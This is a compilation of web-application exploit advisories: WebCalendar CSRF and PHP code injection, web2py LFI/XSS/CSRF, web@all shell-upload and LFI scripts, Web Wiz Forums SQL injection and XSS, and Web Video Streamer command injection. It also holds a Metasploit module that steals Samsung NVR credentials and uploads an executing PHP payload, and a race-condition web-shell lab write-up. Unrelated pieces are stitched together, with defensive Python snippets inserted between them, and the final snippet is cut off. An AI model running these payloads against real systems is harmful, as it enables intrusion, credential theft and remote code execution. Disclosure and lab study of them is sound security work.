<form id="CSRF_ACCESS_CTRL" action="http://localhost/WebCalendar-1.2.7/admin.php" method="post" name="prefform"><br />
<input type="hidden" name="currenttab" id="currenttab" value="settings" />
<input type="submit" value="Save" name="" />
<input type="hidden" name="admin_PUBLIC_ACCESS" value="Y"  />
<script>document.getElementById('CSRF_ACCESS_CTRL').submit()</script>
</form>


#######################################################

Vulnerability Type:
======================
PHP Code Injection



CVE Reference:
==============
N/A



Vulnerability Details:
=====================

Since WebCalendar's install script is not removed after installation (there is
no "automatic" removal of it), low-privileged users can inject arbitrary PHP
code through the "Database Cache" directory value, because no input validation
exists for it when a user installs the application using the WebCalendar
walk-through wizard.

If WebCalendar's installation script is available as part of a default image,
often as a convenience by some hosting providers, this can be used to gain
code execution on the target system. The only requirement is that the user
has privileges to authenticate to the MySQL database and to run the install
script. So, users who have install wizard access for the WebCalendar
application will now have the ability to launch arbitrary system commands on
the affected host.

One problem we must overcome is that WebCalendar filters double quotes ("), so
we cannot use code like <?php echo "/bin/cat /etc/passwd"; ?>. However, we can
defeat this obstacle using the all too often forgotten backtick `CMD` operator!

e.g.

*/?><?php echo `/bin/cat /etc/passwd`; ?>

This results in "settings.php" being injected like...

<?php
/* updated via install/index.php on Wed, 15 Jun 2016 09:44:34 -0400
install_password: e99a18c428cb38d5f260853678922e03
db_type: mysql
db_host: localhost
db_database: intranet
db_login: admin
db_password: abc123
db_persistent: false
db_cachedir: */?><?php echo `/bin/cat /etc/passwd`; ?>
readonly: false
user_inc: user.php
use_http_auth: false
single_user: false
# end settings.php */
?>



Exploitation steps(s):
=====================

1) Login to the WebCalendar Installation Wizard.

2) When you get to WebCalendar Installation Wizard Step 2 of the install
script.
http://localhost/WebCalendar-1.2.7/WebCalendar-1.2.7/install/index.php?action=switch&page=2

3) Click "Test Settings" button to ensure connection to the Database.
4) Enter below PHP code for the "Database Cache Directory:" input fields
value to pop calculator for POC (Windows).

*/?><?php exec(`calc.exe`); ?>

5) Click "Next" button
6) Click "Next" button
7) Click "Save settings" button

BOOOOOOOM! "settings.php" gets overwritten and injected with our PHP code.

If you happen to get the following error when clicking the "Test Settings" button,
"Failure Reason: Database Cache Directory does not exist", just click the back
button and then forward, or click the "Test settings" button again, to try to get
past the error.
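How the settings.php writer described above can be made to reject the `*/?>` breakout, as an added example in Python (not WebCalendar's installer code): it renders the file in the layout shown, counts the PHP open tags the result would contain, and applies an allowlist to db_cachedir. The key order, the sample values and the function names are assumptions.

```python
import re

# Keys in the order the settings.php listing above shows them.
SETTINGS_ORDER = ("install_password", "db_type", "db_host", "db_database",
                  "db_login", "db_password", "db_persistent", "db_cachedir",
                  "readonly", "user_inc", "use_http_auth", "single_user")

# Characters that may legitimately appear in a cache directory path.
CACHEDIR_OK = re.compile(r"^[A-Za-z0-9_.:\\/ -]+$")

# Constructed sample values; only db_cachedir is taken from the wizard form.
BASE_VALUES = {
    "install_password": "<md5-hash-placeholder>", "db_type": "mysql",
    "db_host": "localhost", "db_database": "intranet", "db_login": "admin",
    "db_password": "<password-placeholder>", "db_persistent": "false",
    "readonly": "false", "user_inc": "user.php", "use_http_auth": "false",
    "single_user": "false",
}
# The page's breakout pattern with a harmless body in place of the command.
INJECTED = "*/?><?php echo 1; ?>"


def render_settings(values, updated="Wed, 15 Jun 2016 09:44:34 -0400"):
    """settings.php in the layout shown above: every value is written inside
    one PHP block comment, so a value containing '*/' ends that comment and
    whatever follows it is parsed as code."""
    lines = ["<?php", "/* updated via install/index.php on " + updated]
    lines += ["%s: %s" % (key, values[key]) for key in SETTINGS_ORDER]
    lines += ["# end settings.php */", "?>"]
    return "\n".join(lines) + "\n"


def count_php_blocks(text):
    """Number of PHP open tags in the file; a correct settings.php has one."""
    return len(re.findall(r"<\?(?:php\b)?", text))


def validate_cachedir(value):
    """Allowlist check for db_cachedir.  Raises ValueError on anything that
    could close the comment or open a PHP tag; filtering double quotes, which
    is what the advisory says the installer does, catches none of these."""
    if not value or not CACHEDIR_OK.match(value):
        raise ValueError("db_cachedir may only contain path characters")
    for token in ("*/", "?>", "<?"):     # defence in depth behind the allowlist
        if token in value:
            raise ValueError("db_cachedir contains %r" % token)
    return value


def cachedir_accepted(value):
    try:
        validate_cachedir(value)
        return True
    except ValueError:
        return False


def render_settings_checked(values, **kwargs):
    """Same writer, but db_cachedir must pass the allowlist first."""
    checked = dict(values, db_cachedir=validate_cachedir(values["db_cachedir"]))
    return render_settings(checked, **kwargs)
```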


Disclosure Timeline:
===============================
Vendor Notification:  No replies
July 4, 2016 : Public Disclosure




Exploitation Technique:
=======================
Remote



Severity Level:
================
6.8 (Medium)
CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N


[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere.

HYP3RLINX
            
Title - Web2py 2.14.5 Multiple Vulnerabilities LFI,XSS,CSRF

# Exploit Title : Web2py 2.14.5 Multiple Vulnerabilities LFI, XSS,CSRF
# Reported Date : 2-April-2016
# Fixed Date : 4-April-2016
# Exploit Author : Narendra Bhati - https://www.exploit-db.com/author/?a=7638
# CVE ID : LFI - CVE-2016-4806 , Reflected XSS - CVE-2016-4807 , CSRF - CVE-2016-4808
# Tested On : MAC OS X EI Capitan, Windows 7 64 Bit, Most Linux Platforms.
# Fix/Patching : Update To Web2py. 2.14.6
# Facebook : https://facebook.com/iambhati
# Twitter : http://twitter.com/NarendraBhatiB
# Detailed POC: http://websecgeeks.com/web2py-2-14-5-multiple-vulnerabilities/
==============================================


LFI(Local File Inclusion): CVE-2016-4806

POST URI - /admin/default/pack_custom/[applicationname]

Vulnerable Parameter = file

Exploit - file=/etc/passwd

Authentication Required = Yes(Administrator)

Steps To Reproduction

1) HTTP Request 

POST /admin/default/pack_custom/[applicationname] HTTP/1.1
Host: 127.0.0.1:8000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:8000/admin/default/pack_custom/dasdasdasdad
Cookie: session_id_welcome=asdadasdasdasdasd; session_id_admin=asdasdasdasdasd
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 3213

file=/etc/passwd

2) After sending this request, the application will prompt you to download a file with the "w2p" extension.

3) Now we have to unpack this downloaded file using https://github.com/pigeonflight/web2py-unpacker

I.e. 
Command for unpacking w2p file
python web2py-unpacker.py downloadfile.w2p

4) This command will create a folder called "unpack". In this folder there will be another folder for the web2py application, and in that folder you will find the etc folder containing the passwd file.


Video POC - https://www.youtube.com/watch?v=paCvmHgomP4

Full Detailed POC - http://websecgeeks.com/web2py-2-14-5-multiple-vulnerabilities/

========================================================================

Reflected XSS(Cross Site Scripting) : CVE-2016-4807

GET URI  - http://127.0.0.1:8000/admin/default/install_plugin/dasdasdasdad?plugin=math2py&source=anyurl

Vulnerable Parameter - source

Exploit - http://127.0.0.1:8000/admin/default/install_plugin/[applicationname]?plugin=math2py&source=javascript:alert(1)

Authentication Required - Yes(Administrator)

Steps To Reproduction

1) Go to this URL - http://127.0.0.1:8000/admin/default/install_plugin/[applicationname]?plugin=math2py&source=javascript:alert(1)

2) The value of the "source" parameter is reflected on the page in the "Here" button.

3) When you click that "Here" button, the XSS payload is executed.

Video POC - https://www.youtube.com/watch?v=4j9hXJtVNbk

Detailed POC - http://websecgeeks.com/web2py-2-14-5-multiple-vulnerabilities/

============================================================================


CSRF(Cross Site Request Forgery): CVE-2016-4808

GET URI - http://127.0.0.1:8000/admin/default/enable/[applicationname]

Exploit - http://127.0.0.1:8000/admin/default/enable/[applicationname]

Authentication Required - Yes(Administrator)


Steps To Reproduction

1) Suppose we have an application in web2py called "testingapp"

2) An attacker can trick a victim into disabling the installed application just by sending this URL to the victim - http://127.0.0.1:8000/admin/default/enable/testingapp

Video POC - https://www.youtube.com/watch?v=d4V8qlNrYtk

Detailed POC - http://websecgeeks.com/web2py-2-14-5-multiple-vulnerabilities/
            
source: https://www.securityfocus.com/bid/55426/info

web@all is prone to a local file-include vulnerability and multiple arbitrary file-upload vulnerabilities.

An attacker can exploit these issues to upload arbitrary files onto the web server, execute arbitrary local files within the context of the web server, and obtain sensitive information.

web@all 2.0 is vulnerable; other versions may also be affected. 


###
# Title : Web@all CMS v2.0 <= (ShellUpload/LFI) Multiple Vulnerabilities
# Author : KedAns-Dz
# E-mail : ked-h (@hotmail.com / @1337day.com)
# Home : Hassi.Messaoud (30500) - Algeria -(00213555248701)
# Web Site : www.1337day.com | www.inj3ct0rs.com
# FaCeb0ok : http://fb.me/Inj3ct0rK3d
# Friendly Sites : www.r00tw0rm.com * www.exploit-id.com
# Platform/CatID : php - WebApp - Multiple - 0day
# Type : Multiple Vulnerabilities
# Tested on : Windows XP-SP3 (Fr) / Linux.BackTrack5-rc2 (En)
# Founder : [http://webatall.org]
###


<!-- Proof of Concept ,p0c(1) -->
<!-- Shell Upload .PHP -->
<?php

$uploadfile="inj3ct0r.php";
$ch = curl_init("http://[Target]/[path]/my/kindeditor/php/upload_json.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
       array('imgFile'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";

?>

[*] Or use Tamper Data on /[path]/my/kindeditor/php/upload_json.php and POST your shell

[!] Change inj3ct0r.php to your shell
[+] Access the shell at http://[Target]/[path]/file/[ Ym 'dir]/{raW-File-Name}.php

<!-- Proof of Concept ,p0c(2) -->
<!-- Shell Upload .GIF -->
<?php

$uploadfile="inj3ct0r.gif";
$ch = curl_init("http://[Target]/[path]/inc/cls_upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
       array('tmp_name'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";

?>

[*] Or use Tamper Data on /[path]/inc/cls_upload.php and POST your shell

[!] Change inj3ct0r.gif to your shell
[+] Access the shell at http://[Target]/[path]/file/temp/[ Ym 'dir]/{raW-File-Name}.gif

<!-- Proof of Concept ,p0c(3) -->
<!-- Local File Include -->
<?php
$lfi = curl_init("http://[Target]/[path]/my/kindeditor/index.php");
curl_setopt($lfi, CURLOPT_POST, true);
curl_setopt($lfi, CURLOPT_POSTFIELDS,
  array('lang'=>"../../../../../../../../[ LFI ]%00"));
curl_setopt($lfi, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($lfi);
curl_close($lfi);
print "$postResult";
?>

[*] Or use Tamper Data on /[path]/my/kindeditor/index.php and POST the lang parameter to read local files
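A path-confinement check covering both the web2py `file=/etc/passwd` case earlier on this page and the web@all `lang=../../../[ LFI ]%00` case above, as an added example (not code from either project); the function names and the sample application directory are constructed for this example.

```python
import os
import tempfile
from urllib.parse import unquote


def resolve_under(base_dir, requested):
    """Return the real filesystem path for `requested` inside `base_dir`, or
    raise ValueError.  Handles the three tricks used on this page: an absolute
    path (web2py's file=/etc/passwd), ../ traversal, and a %00 NUL terminator
    (web@all's lang parameter)."""
    value = unquote(requested)            # %00 -> "\x00", %2e%2e -> ".."
    if "\x00" in value:
        raise ValueError("NUL byte in path")
    if os.path.isabs(value) or value.startswith(("/", "\\")):
        raise ValueError("absolute path not allowed")
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, value))
    # realpath has collapsed every ../ segment and followed symlinks; the
    # result must still sit below base (commonpath also defeats a sibling
    # directory whose name merely starts with the base name).
    if os.path.commonpath([base, target]) != base:
        raise ValueError("path escapes the application directory")
    return target


def make_sample_app():
    """Constructed stand-in for an application directory with one view file."""
    root = tempfile.mkdtemp(prefix="app-")
    os.makedirs(os.path.join(root, "views", "default"))
    with open(os.path.join(root, "views", "default", "index.html"), "w") as fh:
        fh.write("<h1>ok</h1>\n")
    return root


# Constructed request values modelled on the PoCs on this page.
SAMPLE_REQUESTS = (
    "views/default/index.html",
    "/etc/passwd",
    "../../../../../../../../etc/passwd",
    "../../../../../../../../etc/passwd%00",
    "views/../views/default/index.html",
)


def check_requests(base_dir, requests=SAMPLE_REQUESTS):
    """Map each request value to 'ok' or 'rejected: <reason>'."""
    results = {}
    for req in requests:
        try:
            resolve_under(base_dir, req)
            results[req] = "ok"
        except ValueError as err:
            results[req] = "rejected: %s" % err
    return results
```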

            
source: https://www.securityfocus.com/bid/54109/info

web@all is prone to a cross-site scripting vulnerability and a cross-site request-forgery vulnerability.

An attacker can exploit these vulnerabilities to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, add, delete or modify sensitive information, or perform unauthorized actions. Other attacks are also possible. 

http://www.example.com/search.php?_text[title]=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E 
            
source: https://www.securityfocus.com/bid/54466/info

web@all is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

web@all 2.0 is vulnerable; other versions may also be affected. 

http://www.example.com/webatall-2.0/my/kindeditor/?name=%3Cscript%3Ealert%28123%29%3C/script%3E 
            
# Exploit Title: Web Wiz Forums 12.01 - 'PF' SQL Injection
# Date: 2019-09-16
# Exploit Author: n1x_ [MS-WEB]
# Vendor Homepage: https://www.webwiz.net/web-wiz-forums/forum-downloads.htm
# Version: 12.01
# Tested on Windows

# Vulnerable parameter: PF (member_profile.asp)
# GET Request

GET /member_profile.asp?PF=10' HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: wwf10lVisit=LV=2019%2D08%2D16+14%3A55%3A50; wwf10sID=SID=1784%2Da7facz6e8757e8ae7b746221064815; ASPSESSIONIDQACRQTCC=OKJNGKBDFFNFKFDJMFIFPBLD
Connection: close
Upgrade-Insecure-Requests: 1
            
source: https://www.securityfocus.com/bid/55220/info

Web Wiz Forums is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

Web Wiz Forums 10.03 is vulnerable; other versions may also be affected. 

http://www.example.com/forum_members.asp?find=S&ForumID=%22%3E%3Cscript%3Ealert(0);%3C/script%3E

http://www.example.com/post_message_form.asp?ForumID=63&mode=new&PagePosition=0&ReturnPage=Thread&ThreadPage="><script>alert(0);</script>&TopicID=57676
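Detection logic for the reflected-XSS and SQL-injection request patterns shown in the WebCTRL, web@all and Web Wiz Forums advisories above, as an added example (not from any of those advisories); it runs over constructed access-log lines modelled on their PoC URLs, and the set of parameters treated as numeric is an assumption.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed access-log lines modelled on the PoC URLs in the advisories above.
SAMPLE_LOG = """\
10.0.0.5 - - [16/Sep/2019:10:01:02 +0000] "GET /member_profile.asp?PF=10' HTTP/1.1" 500 512
10.0.0.5 - - [16/Sep/2019:10:01:03 +0000] "GET /forum_members.asp?find=S&ForumID=%22%3E%3Cscript%3Ealert(0);%3C/script%3E HTTP/1.1" 200 4096
10.0.0.6 - - [16/Sep/2019:10:02:00 +0000] "GET /my/kindeditor/?name=%3Cscript%3Ealert%28123%29%3C/script%3E HTTP/1.1" 200 2048
10.0.0.7 - - [16/Sep/2019:10:03:00 +0000] "GET /search.php?_text[title]=calendar HTTP/1.1" 200 1024
10.0.0.8 - - [16/Sep/2019:10:04:00 +0000] "GET /forum_members.asp?find=S&ForumID=63 HTTP/1.1" 200 4096
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# Markup that has no business in a query parameter of these applications.
SCRIPT_RE = re.compile(r"<\s*/?\s*script|javascript\s*:|\bon[a-z]+\s*=", re.IGNORECASE)
# Parameters the applications above treat as integers (assumed list).
NUMERIC_PARAMS = frozenset({"PF", "ForumID", "TopicID"})


def classify_param(name, value):
    """Return a finding label for one decoded query parameter, or None."""
    if SCRIPT_RE.search(value):
        return "script markup in parameter"
    if name in NUMERIC_PARAMS and not value.isdigit():
        return "non-numeric value in integer parameter"
    return None


def scan_log(text):
    """Return (ip, path, param, finding) for every suspicious parameter."""
    findings = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        # parse_qsl percent-decodes each value once, which is what the
        # application itself sees; double-encoded payloads would need a
        # second unquote() before classification.
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            label = classify_param(name, value)
            if label:
                findings.append((m.group("ip"), parts.path, name, label))
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print("%s %s param=%s: %s" % finding)
```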
            
# Exploit Title: Unrestricted file upload vulnerability - Web Viewer 1.0.0.193 on Samsung SRN-1670D
# Date: 2017-06-19
# Exploit Author: Omar MEZRAG - 0xFFFFFF / www.realistic-security.com
# Vendor Homepage: https://www.hanwhasecurity.com
# Version: Web Viewer 1.0.0.193 on Samsung SRN-1670D
# Tested on: Web Viewer 1.0.0.193 
# CVE : CVE-2017-16524
##
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'digest'

class MetasploitModule < Msf::Exploit::Remote
  	
	Rank = GoodRanking
	include Msf::Exploit::Remote::HttpClient
	include Msf::Exploit::PhpEXE

	def initialize(info = {})
	    super(update_info(info,
	      'Name'           => 'Samsung SRN-1670D - Web Viewer Version 1.0.0.193 Arbitrary File Read & Upload',
	      'Description'    => %q{
		This module exploits an Unrestricted file upload vulnerability in 
		Web Viewer 1.0.0.193 on Samsung SRN-1670D devices: 'network_ssl_upload.php' 
		allows remote authenticated attackers to upload and execute arbitrary
		PHP code via a filename with a .php extension, which is then accessed via a
		direct request to the file in the upload/ directory. 
		To authenticate for this attack, one can obtain web-interface credentials 
		in cleartext by leveraging the existing Local File Read Vulnerability 
		referenced as CVE-2015-8279, which allows remote attackers to read the 
		web interface credentials via a request for the
		cslog_export.php?path=/root/php_modules/lighttpd/sbin/userpw URI.
	      },

	      'Author'         => [
		'Omar Mezrag <omar.mezrag@realistic-security.com>',  # @_0xFFFFFF
	        'Realistic Security',
	        'Algeria'
	       ],
	      'License'        => MSF_LICENSE,
	      'References'     =>
	        [
	          [ 'CVE', '2017-16524' ],
	          [ 'URL', 'https://github.com/realistic-security/CVE-2017-16524' ],
	          [ 'CVE', '2015-8279' ],
	          [ 'URL', 'http://blog.emaze.net/2016/01/multiple-vulnerabilities-samsung-srn.html' ]
	        ],
	      'Privileged'     => true,
	      'Arch'           => ARCH_PHP,
	      'Platform'       => 'php',
	      'Targets'        =>
	        [
			['Samsung SRN-1670D == 1.0.0.193', {}]
	        ],
	      'DefaultTarget'  => 0,
	      'DisclosureDate' => 'Mar 14 2017'
	    ))

	    register_options(
	      [
	        OptString.new('RHOST', [ true, 'The target address.' ]),
		OptString.new('RPORT', [ true, 'The target port (TCP).', '80' ]),
	      ])
	end


	def check
		#
		print_status('Checking version...') 

	 	resp = send_request_cgi({
			'uri'     =>  "/index",
			'version' => '1.1',
			'method' => 'GET',
			'headers' =>
				{
				   'User-Agent' => "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)"
				}
	        })
	    
		unless resp
			print_error("Connection timed out.")
			return Exploit::CheckCode::Unknown
		end
		#        <!---------------------------------   File Version 1.0.0.193   --------------------------------->
		version = nil
		if resp and resp.code == 200  and resp.body.match(/Web Viewer for Samsung NVR/)
				if resp.body =~ /File Version (\d+\.\d+\.\d+\.\d+)/
					version = $1
					if version == '1.0.0.193'
						print_good "Found version: #{version}"
						return Exploit::CheckCode::Appears
					end
				end
		end

		Exploit::CheckCode::Safe

	end

	def exploit

	 
		print_status('Obtaining credentials...')
	 
	 	resp = send_request_cgi({
			'uri'     =>  "/cslog_export.php",
			'version' => '1.1',
			'method' => 'GET',
			'vars_get'=>
				{
				'path' => '/root/php_modules/lighttpd/sbin/userpw',
				'file' => 'foo'
				},
			'headers' =>
				{
				   'User-Agent' => "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)"
				}
	        })
		
		unless resp
			print_error("Connection timed out.")
			return Exploit::CheckCode::Unknown
		end

		if resp and resp.code == 200 and resp.body !~ /Authentication is failed/ and resp.body !~ /File not found/
			username =  resp.body.split(':')[0]
			password =  resp.body.split(':')[1].gsub("\n",'')
			print_good "Credentials obtained successfully: #{username}:#{password}"
				

				data1 = Rex::Text.encode_base64("#{username}")
				data2 = Digest::SHA256.hexdigest("#{password}")

				randfloat  = Random.new
				data3 =  randfloat.rand(0.9)
				data4 = data3

				print_status('Logging in...')

			 	resp = send_request_cgi({
					'uri'     =>  "/login",
					'version' => '1.1',
					'method' => 'POST',
					'vars_post'=>
						{
							'data1' => data1,
							'data2' => data2,
							'data3' => data3,
							'data4' => data4
						},
					'headers' =>
						{
						   'User-Agent' => "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)",
						   'DNT' => "1",
						   'Cookie' => "IESEVEN=1"
						}
				})

				unless resp
					print_error("Connection timed out.")
					return Exploit::CheckCode::Unknown
				end
				
				if resp and resp.code == 200  and resp.body !~ /ID incorrecte/  and resp.body =~ /setCookie\('NVR_DATA1/

					print_good('Authentication Succeeded') 

					nvr_d1 = $1 if resp.body =~ /setCookie\('NVR_DATA1', '(\d\.\d+)'/
					nvr_d2 = $1 if resp.body =~ /setCookie\('NVR_DATA2', '(\d+)'/
					nvr_d3 = $1 if resp.body =~ /setCookie\('NVR_DATA3', '(0x\h\h)'/
					nvr_d4 = $1 if resp.body =~ /setCookie\('NVR_DATA4', '(0x\h\h)'/
					nvr_d7 = $1 if resp.body =~ /setCookie\('NVR_DATA7', '(\d)'/
					nvr_d8 = $1 if resp.body =~ /setCookie\('NVR_DATA8', '(\d)'/
					nvr_d9 = $1 if resp.body =~ /setCookie\('NVR_DATA9', '(0x\h\h)'/

					cookie = "IESEVEN=1; NVR_DATA1=#{nvr_d1}; NVR_DATA2=#{nvr_d2}; NVR_DATA3=#{nvr_d3}; NVR_DATA4=#{nvr_d4}; NVR_DATA7=#{nvr_d7}; NVR_DATA8=#{nvr_d8}; NVR_DATA9=#{nvr_d9}"

					payload_name = "#{rand_text_alpha(8)}.php"

					print_status("Generating payload[ #{payload_name} ]...") 

					php_payload = get_write_exec_payload(:unlink_self=>true)
				
					print_status('Uploading payload...') 

					data = Rex::MIME::Message.new
					data.add_part("2", nil, nil, 'form-data; name="is_apply"')
					data.add_part("1", nil, nil, 'form-data; name="isInstall"')
					data.add_part("0", nil, nil, 'form-data; name="isCertFlag"')
					data.add_part(php_payload, 'application/x-httpd-php', nil, "form-data; name=\"attachFile\"; filename=\"#{payload_name}\"")
					post_data = data.to_s

					resp = send_request_cgi({

						'uri'      => normalize_uri('/network_ssl_upload.php'),
						'method'   => 'POST',
						'vars_get' => 
							{
							'lang' => 'en'
							},
						'headers' =>
							{
							   'User-Agent' => "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)"
							},
						'ctype'    => "multipart/form-data; boundary=#{data.bound}",
						'cookie'   => cookie,
						'data'     => post_data

					    })

					unless resp
						print_error("Connection timed out.")
						return Exploit::CheckCode::Unknown
					end

					if resp and resp.code == 200 
						print_status('Executing payload...') 
						upload_uri = normalize_uri("/upload/" + payload_name)
						# Keep the response so the checks below examine the payload request,
						# not the earlier upload response
						resp = send_request_cgi({
							'uri'    => upload_uri,
							'method' => 'GET'
						},5)

						unless resp
							print_error("Connection timed out.")
							return Exploit::CheckCode::Unknown
						end

						if resp and resp.code != 200
							print_error("Failed to upload")
						end

					else
						print_error("Failed to upload")
					end
				else
					print_error("Authentication failed")
				end
			
		else
			print_error "Error obtaining credentials"
		end
	end
end

source: https://www.securityfocus.com/bid/65350/info

Web Video Streamer is prone to the following multiple security vulnerabilities:

1. Multiple cross-site scripting vulnerabilities
2. A directory-traversal vulnerability
3. A command-injection vulnerability

A remote attacker can leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and to view arbitrary local files and directories within the context of the webserver. This may let the attacker steal cookie-based authentication credentials and gain access to sensitive information, which may aid in launching further attacks.

Web Video Streamer 1.0 is vulnerable; other versions may also be affected. 

Command injection and directory traversal:
http://www.example.com/webstreamer-master/player.php?name=drops.avi&file=drop.avi';ls>/tmp/foo;a'&type=video/mp4&t=1389685059
http://www.example.com/webstreamer-master/index.php?dir=../../../

XSS:
http://www.example.com/webstreamer-master/player.php?name=%3Cscript%3Ealert%281%29%3C/script%3Etest
http://www.example.com/webstreamer-master/index.php?dir=../../%3Cscript%3Ealert%281%29%3C/script%3E


In this post we will be solving the PortSwigger lab "Web shell upload via race condition".

image 154

To solve the lab we have to upload a PHP file that reads and shows us the contents of the file /home/carlos/secret, since to prove we have completed the lab we will have to submit the contents of that file.

In addition, the server has strong defenses against the upload of malicious files, so we will have to exploit a race condition.

In this case, the lab itself provides us with an account to log in with, so let's do that:

image 155
image 156

Once we have logged in, we land on the account profile:

image 157

As we can see, there is an option to upload files, and specifically it appears to be for updating the profile avatar. Let's try to take advantage of this option to upload the following PHP file:

image 158

First of all, let's set up Burp Suite to intercept the request:

image 159
image 160

Once Burp Suite is ready together with the proxy, we select the file and click "Upload":

image 161
image 162
image 163

Here Burp Suite will intercept the file upload request:

image 164

With the request captured, let's send it to the Repeater so we can see the server's response:

image 165

As we can see, it tells us that only JPG and PNG files are allowed. Furthermore, the lab told us that the server has strong defenses, so it does not look like any of the methods seen in the other labs is going to work.

In this case, what we are going to exploit is a race condition. Basically, when we send a file that the server does not allow, the file is actually uploaded to the server; what happens is that milliseconds later the server checks the file against the sanitization rules it has configured and, if it fails any of them, deletes it. But for a tiny period of time the file remains uploaded on the server.

To exploit this, we will use the "Turbo Intruder" extension. We can install it from Burp Suite itself:

image 166

Once installed, we go to the request we had intercepted and sent to the Repeater, and right-click it to send it to Turbo Intruder:

image 167

A tab like the following will open:

image 168

Basically, in the upper part we have our request, and in the lower part we have, so to speak, the script that tells the extension what we want it to do.

The idea is to use the following code, so we delete the entire default script in the lower part and replace it with the following:

def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint, concurrentConnections=10,)

    request1 = '''<YOUR-POST-REQUEST>'''

    request2 = '''<YOUR-GET-REQUEST>'''

    # the 'gate' argument blocks the final byte of each request until openGate is invoked
    engine.queue(request1, gate='race1')
    for x in range(5):
        engine.queue(request2, gate='race1')

    # wait until every 'race1' tagged request is ready
    # then send the final byte of each request
    # (this method is non-blocking, just like queue)
    engine.openGate('race1')

    engine.complete(timeout=60)


def handleResponse(req, interesting):
    table.add(req)

image 169

The idea is that the extension will make the POST request that uploads the PHP file and, immediately afterwards, will make 5 GET requests to the absolute path where the file will be uploaded. That way, with some luck, one of those 5 GET requests lands between the moment the file has been uploaded and the moment the server has checked and deleted it, inside that tiny window of time.

To be clear, in the code we have just pasted in, we put the complete POST request in the variable request1 and the complete GET request in the variable request2. We can use the HTTP History to obtain the GET request, for example:
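The write-then-validate pattern described above, placed beside a hardened upload handler, as an added example in Python that is not part of the lab or of the original post. The function names, the `observer` callback (which stands in for the concurrent GET at the instant the handler yields to other requests) and the PHP and PNG sample bytes are constructed for illustration.

```python
import os, secrets, tempfile

MAGIC = {b"\xff\xd8\xff": ".jpg", b"\x89PNG\r\n\x1a\n": ".png"}  # constructed allow-list: JPG/PNG only, like the lab

def sniff_extension(data):
    """Extension for a recognised image header, or None."""
    for magic, ext in MAGIC.items():
        if data.startswith(magic):
            return ext
    return None

def vulnerable_save(webroot, filename, data, observer=lambda p: None):
    """Write first, validate later: the TOCTOU window the lab exploits.
    `observer` is a hypothetical hook standing in for a concurrent GET."""
    path = os.path.join(webroot, filename)
    with open(path, "wb") as fh:
        fh.write(data)
    observer(path)          # the PHP file is already being served here
    if sniff_extension(data) is None:
        os.unlink(path)     # too late if a GET landed inside the window
        return None
    return path

def hardened_save(webroot, staging, data, observer=lambda p: None):
    """Validate before writing, stage outside the web root, then publish
    atomically under a server-chosen name the client cannot predict."""
    ext = sniff_extension(data)
    if ext is None:
        return None         # rejected before any byte reaches disk
    fd, tmp = tempfile.mkstemp(dir=staging)
    with os.fdopen(fd, "wb") as fh:
        fh.write(data)
    final = os.path.join(webroot, secrets.token_hex(8) + ext)
    observer(final)         # nothing exists under webroot yet
    os.replace(tmp, final)  # atomic rename; staging must share the filesystem
    return final

def demo():
    """Constructed scenario: the lab's PHP probe versus a real PNG header."""
    webroot, staging = tempfile.mkdtemp(), tempfile.mkdtemp()
    php = b"<?php echo file_get_contents('/home/carlos/secret'); ?>"
    png = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
    seen = []
    spy = lambda p: seen.append(os.path.exists(p))  # one "GET" per window
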